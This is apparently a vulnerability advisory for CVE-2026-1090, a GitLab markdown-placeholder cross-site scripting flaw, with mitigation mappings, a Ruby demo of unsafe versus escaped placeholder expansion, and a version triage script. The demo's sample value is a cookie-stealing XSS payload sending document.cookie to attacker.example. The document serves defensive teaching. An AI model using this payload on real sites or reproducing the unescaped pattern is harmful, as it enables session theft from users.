CVE-2026-1090
Published: 11 March 2026
Summary
CVE-2026-1090 is a high-severity Cross-site Scripting (CWE-79) vulnerability in GitLab CE/EE. Its CVSS base score is 8.7 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Command and Scripting Interpreter: JavaScript (T1059.007). It sits at the 22.1 percentile for exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
SI-15 (Information Output Filtering) requires that placeholder values be filtered or escaped at the point where the markdown pipeline emits HTML, so unsanitized placeholder content cannot carry JavaScript into the viewer's browser.
SI-10 (Information Input Validation) requires that placeholder content be validated and sanitized before it reaches the markdown renderer, which directly addresses the XSS flaw.
SI-2 (Flaw Remediation) covers timely patching; GitLab's fixes shipped in versions 18.7.6, 18.8.6 and 18.9.2. Per the vendor description, exposure also requires the `markdown_placeholders` feature flag to be enabled, so instances that keep the flag disabled until they are patched are not exposed to this issue.
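To make the SI-10 / SI-15 pairing concrete, here is an added example (not GitLab's code, and not the affected pipeline) of a toy placeholder expander in the style of a markdown rendering step. The `{{name}}` syntax, the function names and the sample values are constructed for this illustration. The unsafe expander substitutes a user-controlled value verbatim into HTML; the hardened variants escape on output (SI-15) and reject markup-bearing values on input (SI-10).

```ruby
require 'cgi'

# Hypothetical placeholder syntax used only by this example.
PLACEHOLDER = /\{\{(\w+)\}\}/

# Constructed sample values. The second one is the kind of string an
# authenticated user could supply if placeholder values are user-controlled.
VALUES = {
  'project'  => 'infra-tools',
  'greeting' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
}.freeze

# Vulnerable pattern: the placeholder value is dropped into the HTML the renderer
# emits without any escaping, so markup in the value becomes live DOM in the
# viewer's browser (CWE-79).
def expand_unsafe(html, values)
  html.gsub(PLACEHOLDER) { values.fetch(Regexp.last_match(1), '') }
end

# Hardened, SI-15 (output filtering): escape the value at the moment it enters
# HTML, so it is always rendered as text and never as markup.
def expand_escaped(html, values)
  html.gsub(PLACEHOLDER) { CGI.escapeHTML(values.fetch(Regexp.last_match(1), '')) }
end

# Hardened, SI-10 (input validation): refuse values that carry markup
# characters at all, so a bad value is rejected when it is stored rather than
# relying solely on the render path. Keeping both layers covers the case where a
# later pipeline step decodes entities or a value reaches a non-HTML sink.
def valid_placeholder_value?(value)
  value.is_a?(String) && value.length <= 200 && !value.match?(/[<>"'&]/)
end

# Returns the rendered HTML, or nil if any value fails validation.
def expand_validated(html, values)
  return nil unless values.values.all? { |v| valid_placeholder_value?(v) }
  expand_escaped(html, values)
end

# Cheap post-render check: does the output contain an element, or an on* event
# handler attribute inside a tag, that no placeholder value should be able to
# introduce? Useful as a regression assertion around a rendering pipeline.
def contains_injected_markup?(html)
  html.match?(/<(script|img|svg|iframe)\b/i) || html.match?(/<\w+[^>]*\son\w+\s*=/i)
end

if __FILE__ == $PROGRAM_NAME
  doc = '<p>Welcome to {{project}}: {{greeting}}</p>'
  puts "unsafe:   #{expand_unsafe(doc, VALUES)}"
  puts "escaped:  #{expand_escaped(doc, VALUES)}"
  puts "validated: #{expand_validated(doc, VALUES).inspect}"
end
```

The escaped output still contains the literal text `onerror=`, which is harmless because the enclosing `<img` was turned into `&lt;img`; the post-render check therefore only flags event handlers that sit inside a real tag, otherwise it would false-positive on correctly escaped content.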
MITRE ATT&CK Enterprise Techniques
Why these techniques?
XSS lets the attacker inject JavaScript that executes in the victim's browser within the GitLab origin, which is exactly the behaviour T1059.007 describes.
NVD Description
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user, when the `markdown_placeholders` feature flag was enabled, to inject JavaScript in a browser due to improper sanitization of placeholder content in markdown processing.
Deeper analysis
CVE-2026-1090 is a cross-site scripting vulnerability (CWE-79) affecting GitLab Community Edition (CE) and Enterprise Edition (EE) in all versions from 10.6 prior to 18.7.6, 18.8 prior to 18.8.6, and 18.9 prior to 18.9.2. The flaw arises from improper sanitization of placeholder content during markdown processing when the `markdown_placeholders` feature flag is enabled, enabling JavaScript injection in a browser.
An authenticated user can exploit this vulnerability remotely with low attack complexity, though it requires user interaction (a victim must view the rendered content). Successful exploitation lets the attacker run JavaScript in the victim's browser, with high confidentiality and integrity impact and no availability impact; the scope is rated changed because the script executes in the victim's browser rather than in the component that holds the flaw. This is reflected in the CVSS 3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N).
GitLab remediated the issue with patches released in versions 18.7.6, 18.8.6, and 18.9.2, as documented in the patch release notes for 18.9.2. Additional details are provided in GitLab work item 586478 and the originating HackerOne report 3502450.
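For triage, here is an added example (not GitLab tooling) that encodes the affected ranges from the NVD description and the analysis above and reports whether a given GitLab version string falls inside them. The functions and the edition-suffix handling (e.g. `18.8.0-ee`) are assumptions of this example; the ranges and patched versions come from the advisory text.

```ruby
# Affected ranges as stated in the advisory: [inclusive lower bound, exclusive upper bound).
# The upper bounds are the patched releases.
AFFECTED_RANGES = [
  ['10.6', '18.7.6'],
  ['18.8', '18.8.6'],
  ['18.9', '18.9.2'],
].freeze

# Parse "18.8.0-ee" into [18, 8, 0]. Comparing numerically, not lexically,
# matters here: "18.10" must sort after "18.9".
def parse_version(str)
  str.to_s.strip.sub(/-.*\z/, '').split('.').map { |part| Integer(part, 10) }
end

# Three-way compare with missing components treated as zero ("18.8" == "18.8.0").
def version_cmp(a, b)
  pa = parse_version(a)
  pb = parse_version(b)
  n = [pa.length, pb.length].max
  pa += [0] * (n - pa.length)
  pb += [0] * (n - pb.length)
  pa <=> pb
end

def affected_version?(version)
  AFFECTED_RANGES.any? do |lower, upper|
    version_cmp(version, lower) >= 0 && version_cmp(version, upper) < 0
  end
end

# The vendor description makes exposure conditional on the markdown_placeholders
# feature flag being enabled, so both facts are needed for a "yes".
def exposed?(version, markdown_placeholders_enabled)
  affected_version?(version) && markdown_placeholders_enabled
end

if __FILE__ == $PROGRAM_NAME
  %w[18.7.5 18.7.6 18.8.0-ee 18.8.6 18.9.1 18.9.2 18.10.0 10.5.9].each do |v|
    puts format('%-10s affected=%s', v, affected_version?(v))
  end
end
```

Versions at or above a patched release in each stream (18.7.6, 18.8.6, 18.9.2) and anything newer than the 18.9 stream are reported as not affected, which is all the advisory supports; the flag state still has to be read from the instance itself.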
Details
- CWE(s)